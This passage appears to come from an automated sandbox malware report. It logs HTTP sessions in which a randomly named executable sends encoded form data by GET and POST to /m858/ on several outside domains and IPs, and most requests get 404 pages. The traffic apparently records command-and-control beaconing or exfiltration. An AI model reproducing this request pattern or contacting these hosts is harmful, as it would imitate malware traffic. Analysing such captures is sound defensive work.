                                                                                                                      Data Raw: 6e 52 52 70 53 3d 78 2f 44 71 30 4f 53 6a 63 57 62 6e 78 36 36 59 71 33 42 79 34 76 2b 4a 6c 62 51 31 31 78 71 6f 41 48 4a 57 63 70 33 6a 74 75 36 42 37 65 70 55 50 44 4e 61 36 6c 41 48 46 43 45 31 43 39 35 48 4a 41 4c 46 77 6e 71 55 75 54 74 66 35 71 43 32 48 68 39 31 37 4d 73 73 50 74 75 52 76 6a 30 38 4c 34 2b 45 78 4d 70 4b 71 73 50 42 52 45 39 6c 39 41 48 48 63 66 78 68 33 35 37 6c 52 61 6f 51 46 45 54 46 68 2b 4b 58 78 35 41 72 4d 6a 52 54 67 30 44 51 70 75 5a 30 33 4c 61 41 68 6e 75 74 56 6c 50 4c 30 6b 64 51 48 78 6c 54 68 53 64 34 31 5a 66 34 47 53 72 33 5a 2b 64 68 4e 38 61 6f 4c 43 4d 4b 41 78 4d 57 73 68 65 71 53 50 61 6b 5a 4b 76 47 63 4a 63 6c 4b 55 30 47 77 44 71 6c 62 4a 79 6b 79 6c 70 77 2f 48 4b 78 5a 2b 41 4f 6d 79 47 62 41 76 42 62 59 51 70 63 41 43 54 74 6c 73 73 4d 38 30 70 77 52 7a 66 69 72 66 4f 54 6f 61 36 70 68 34 6e 54 32 6d 47 6b 6f 30 52 59 38 7a 36 43 53 65 72 4e 49 35 6d 55 39 4f 67 45 4e 43 75 64 76 58 73 43 47 79 4e 6c 71 76 73 68 53 2f 32 36 6d 46 41 65 49 4d 36 30 4a 59 54 68 44 6d 48 61 2f 54 73 64 39 30 35 6d 45 78 6a 72 4f 75 4a 45 36 54 79 4d 32 54 61 47 63 68 4e 53 49 32 58 49 64 41 6d 58 7a 31 6d 7a 6d 4e 44 65 76 6a 4a 64 6a 50 6b 61 57 39 4c 73 43 4a 46 77 45 42 4a 61 47 45 41 6b 4d 6f 59 53 68 50 52 64 6d 6a 67 79 4f 69 4b 35 54 78 79 48 52 58 61 76 4c 6f 48 49 6e 57 50 4f 61 47 36 70 57 6c 31 65 64 6e 66 54 75 75 57 56 55 6b 58 71 7a 4e 33 57 61 68 51 49 4e 6d 65 70 70 5a 71 5a 43 37 76 57 48 73 6e 4d 57 52 54 67 62 4f 65 70 32 56 54 33 6b 66 4c 6e 75 73 6a 39 35 6c 73 39 5a 6d 57 4d 31 66 4c 37 35 31 36 55 5a 62 36 75 4e 4c 56 51 35 7a 64 72 6f 47 45 72 35 32 34 4e 49 4a 56 51 6b 57 68 44 2b 4b 51 75 30 34 58 45 70 65 6c 34 4b 4c 76 55 61 77 4b 59 2b 70 45 53 38 37 50 53 4d 6f 33 2f 4a 35 4b 43 4f 42 4e 65 37 44 37 7a 51 39 36 6c 70 41 6c 71 2f 6f 76 4f 31 59 38 67 4c 7a 62 42 4b 38 75 2b 30 45 4b 39 6e 71 6e 4f 64 42 52 38 30 67 55 6b 52 77 70 6a 34 4d 6c 2b 36 59 73 41 70 75 49 61 66 31 58 39 51 59 31 51 4a 6e 56 6a 45 68 70 4d 4b 4d 79 56 78 55 75 6e 42 66 75 6e 47 68 46 72 4b 6f 46 42 6d 6e 71 47 4e 30 48 78 4d 49 6b 50 58 32 55 58 2b 34 58 61 56 75 2b 4b 50 2f 51 64 70 43 6d 43 32 56 43 63 62 39 78 4c 30 65 78 36 78 32 58 78 73 39 43 73 70 4b 51 44 75 56 36 49 47 4e 71 73 55 73 75 72 68 2b 58 4c 6a 57 73 31 62 4a 50 61 74 2f 41 44 66 5a 50 76 73 4b 53 57 39 37 62 6a 49 38 6b 39 35 4f 68 38 67 6d 5a 64 4e 6b 46 6d 74 79 58 62 59 66 72 46 5a 74 31 50 68 49 5a 44 47 33 33 51 45 66 71 63 36 50 4b 77 75 72 50 75 48 67 69 2b 6d 6f 42 6f 45 2b 65 62 4b 34 4d 39 6d 76 4d 39 5a 57 4a 7a 76 30 74 73 49 58 4d 54 7a 31 77 46 31 39 71 30 75 75 33 52 67 51 5a 6e 42 4f 75 4a 57 36 61 4d 71 4a 79 4d 44 68 50 4b 79 6f 6d 2f 7a 61 30 6e 62 42 2b 72 73 6e 6d 59 42 7a 62 4d 56 47 59 38 76 42 51 67 2b 38 44 33 5a 42 4f 37 35 63 4e 51 48 75 39 62 41 70 34 2f 72 6b 4d 67 71 48 78 42 41 36 76 43 47 79 48 61 59 49 46 63 44 4d 73 32 55 6c 4b 4f 37 78 47 79 33 52 76 6b 55 36 31 6b 53 2b 67 4d 6e 51 73 53 6f 31 62 6f 53 37 46 75 71 57 44 58 68 65 33 4c 41 4c 65 2f 75 62 53 47 63 30 6e 6f 6a 6c 67 43 59 6e 62 68 74 36 46 63 61 6a 5a 70 65 67 49 79 41 43 38 75 4c 58 58 38 42 37 73 77 35 38 79 52 6f 79 55 36 4f 63 70 4c 53 48 38 38 57 30 78 50 62 63 51 59 53 6b 4a 4e 76 2f 6e 57 54 77 4e 4a 38 6d 44 57 59 6f 78 50 4c 4e 53 52 46 71 53 30 63 44 36 75 6e 45 43 2b 38 73 4c 74 4a 78 51 56 6d 7a 49 72 61 4b 31 55 64 65 68 66 6b 6e 72 30 4e 49 57 2b 54 52 57 33 71 36 6a 59 4d 2b 57 4a 51 55 54 58 59 73 65 63 4e 64 56 63 67 4a 62 42 75 30 4c 4f 51 35 35 39 75 4e 43 32 79 56 34 2f 52 65 6e 6e 45 30 78 38 64 7a 6c 45 45 55 51 69 79 4f 49 72 38 66 53 42 61 31 77 6d 51 46 37 62
                                                                                                                      Data Ascii: nRRpS=x/Dq0OSjcWbnx66Yq3By4v+JlbQ11xqoAHJWcp3jtu6B7epUPDNa6lAHFCE1C95HJALFwnqUuTtf5qC2Hh917MssPtuRvj08L4+ExMpKqsPBRE9l9AHHcfxh357lRaoQFETFh+KXx5ArMjRTg0DQpuZ03LaAhnutVlPL0kdQHxlThSd41Zf4GSr3Z+dhN8aoLCMKAxMWsheqSPakZKvGcJclKU0GwDqlbJykylpw/HKxZ+AOmyGbAvBbYQpcACTtlssM80pwRzfirfOToa6ph4nT2mGko0RY8z6CSerNI5mU9OgENCudvXsCGyNlqvshS/26mFAeIM60JYThDmHa/Tsd905mExjrOuJE6TyM2TaGchNSI2XIdAmXz1mzmNDevjJdjPkaW9LsCJFwEBJaGEAkMoYShPRdmjgyOiK5TxyHRXavLoHInWPOaG6pWl1ednfTuuWVUkXqzN3WahQINmeppZqZC7vWHsnMWRTgbOep2VT3kfLnusj95ls9ZmWM1fL7516UZb6uNLVQ5zdroGEr524NIJVQkWhD+KQu04XEpel4KLvUawKY+pES87PSMo3/J5KCOBNe7D7zQ96lpAlq/ovO1Y8gLzbBK8u+0EK9nqnOdBR80gUkRwpj4Ml+6YsApuIaf1X9QY1QJnVjEhpMKMyVxUunBfunGhFrKoFBmnqGN0HxMIkPX2UX+4XaVu+KP/QdpCmC2VCcb9xL0ex6x2Xxs9CspKQDuV6IGNqsUsurh+XLjWs1bJPat/ADfZPvsKSW97bjI8k95Oh8gmZdNkFmtyXbYfrFZt1PhIZDG33QEfqc6PKwurPuHgi+moBoE+ebK4M9mvM9ZWJzv0tsIXMTz1wF19q0uu3RgQZnBOuJW6aMqJyMDhPKyom/za0nbB+rsnmYBzbMVGY8vBQg+8D3ZBO75cNQHu9bAp4/rkMgqHxBA6vCGyHaYIFcDMs2UlKO7xGy3RvkU61kS+gMnQsSo1boS7FuqWDXhe3LALe/ubSGc0nojlgCYnbht6FcajZpegIyAC8uLXX8B7sw58yRoyU6OcpLSH88W0xPbcQYSkJNv/nWTwNJ8mDWYoxPLNSRFqS0cD6unEC+8sLtJxQVmzIraK1Udehfknr0NIW+TRW3q6jYM+WJQUTXYsecNdVcgJbBu0LOQ559uNC2yV4/RennE0x8dzlEEUQiyOIr8fSBa1wmQF7b
                                                                                                                      Dec 7, 2023 13:44:32.867677927 CET479INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:32 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      28192.168.2.849736207.244.126.150806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:44:35.378384113 CET450OUTGET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIiyM5CO9qwuDsBag== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.speedbikesglobal.com
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 13:44:35.550909042 CET479INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:35 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 315
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      29192.168.2.849737162.240.81.18806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:44:41.085377932 CET727OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Origin: http://www.belaflorloja.online
                                                                                                                      Referer: http://www.belaflorloja.online/m858/
                                                                                                                      Content-Length: 186
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 32 71 47 79 69 2b 58 6f 58 69 6f 75 54 6a 64 71 69 6d 4a 77 65 71 37 49 33 54 48 50 6f 68 4a 7a 61 38 47 6f 33 58 75 41 6c 4f 6a 2b 59 4e 6c 2f 41 44 54 42 54 67 50 6d 75 6b 6f 6f 42 2b 4f 55 73 30 56 46 30 68 47 53 6e 42 71 56 45 5a 67 79 56 72 47 46 70 4c 7a 4a 71 35 77 71 5a 75 4a 38 6d 41 76 70 35 37 4a 36 31 4c 6e 58 61 55 33 67 42 36 71 63 34 34 66 37 56 76 78 76 69 57 45 4a 66 76 51 2b 70 31 62 53 34 79 33 66 51 6c 30 34 71 6a 48 6a 64 64 71 75 4c 58 54 6e 4d 2b 4b 50 4d 76 6f 6a 69 52 7a 45 2b 50 62 4a 4e 6d 50 38 6c 77 3d 3d
                                                                                                                      Data Ascii: nRRpS=2qGyi+XoXiouTjdqimJweq7I3THPohJza8Go3XuAlOj+YNl/ADTBTgPmukooB+OUs0VF0hGSnBqVEZgyVrGFpLzJq5wqZuJ8mAvp57J61LnXaU3gB6qc44f7VvxviWEJfvQ+p1bS4y3fQl04qjHjddquLXTnM+KPMvojiRzE+PbJNmP8lw==
                                                                                                                      Dec 7, 2023 13:44:41.281639099 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:41 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                      Dec 7, 2023 13:44:41.281702995 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a
                                                                                                                      Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                      Dec 7, 2023 13:44:41.281744957 CET1251INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      30192.168.2.849738162.240.81.18806992C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 13:44:43.810091019 CET747OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.belaflorloja.online
                                                                                                                      Origin: http://www.belaflorloja.online
                                                                                                                      Referer: http://www.belaflorloja.online/m858/
                                                                                                                      Content-Length: 206
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 6e 52 52 70 53 3d 32 71 47 79 69 2b 58 6f 58 69 6f 75 53 41 31 71 76 6c 68 77 62 4b 37 48 72 44 48 50 68 42 4a 6f 61 38 4b 6f 33 54 57 51 6c 38 33 2b 59 6f 42 2f 42 43 54 42 51 67 50 6d 6d 45 6f 68 65 75 4f 50 73 30 52 4e 30 67 4b 53 6e 41 4b 56 45 59 38 79 56 59 75 4b 6f 62 7a 50 6c 5a 77 6f 55 4f 4a 38 6d 41 76 70 35 2f 68 51 31 4c 66 58 64 6e 76 67 41 59 43 44 31 59 66 34 53 76 78 76 6f 47 45 4e 66 76 51 51 70 77 36 35 34 77 2f 66 51 67 49 34 71 57 71 31 57 64 71 6f 46 33 53 52 66 76 4c 56 49 64 59 4c 71 77 44 56 69 6f 72 48 49 7a 6a 76 69 44 70 76 4b 61 65 54 74 53 65 41 36 34 64 43 44 43 75 59 56 4f 6f 3d
                                                                                                                      Data Ascii: nRRpS=2qGyi+XoXiouSA1qvlhwbK7HrDHPhBJoa8Ko3TWQl83+YoB/BCTBQgPmmEoheuOPs0RN0gKSnAKVEY8yVYuKobzPlZwoUOJ8mAvp5/hQ1LfXdnvgAYCD1Yf4SvxvoGENfvQQpw654w/fQgI4qWq1WdqoF3SRfvLVIdYLqwDViorHIzjviDpvKaeTtSeA64dCDCuYVOo=
                                                                                                                      Dec 7, 2023 13:44:44.006035089 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Thu, 07 Dec 2023 12:44:43 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 3650
                                                                                                                      Connection: close
                                                                                                                      ETag: "636d2d22-e42"
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 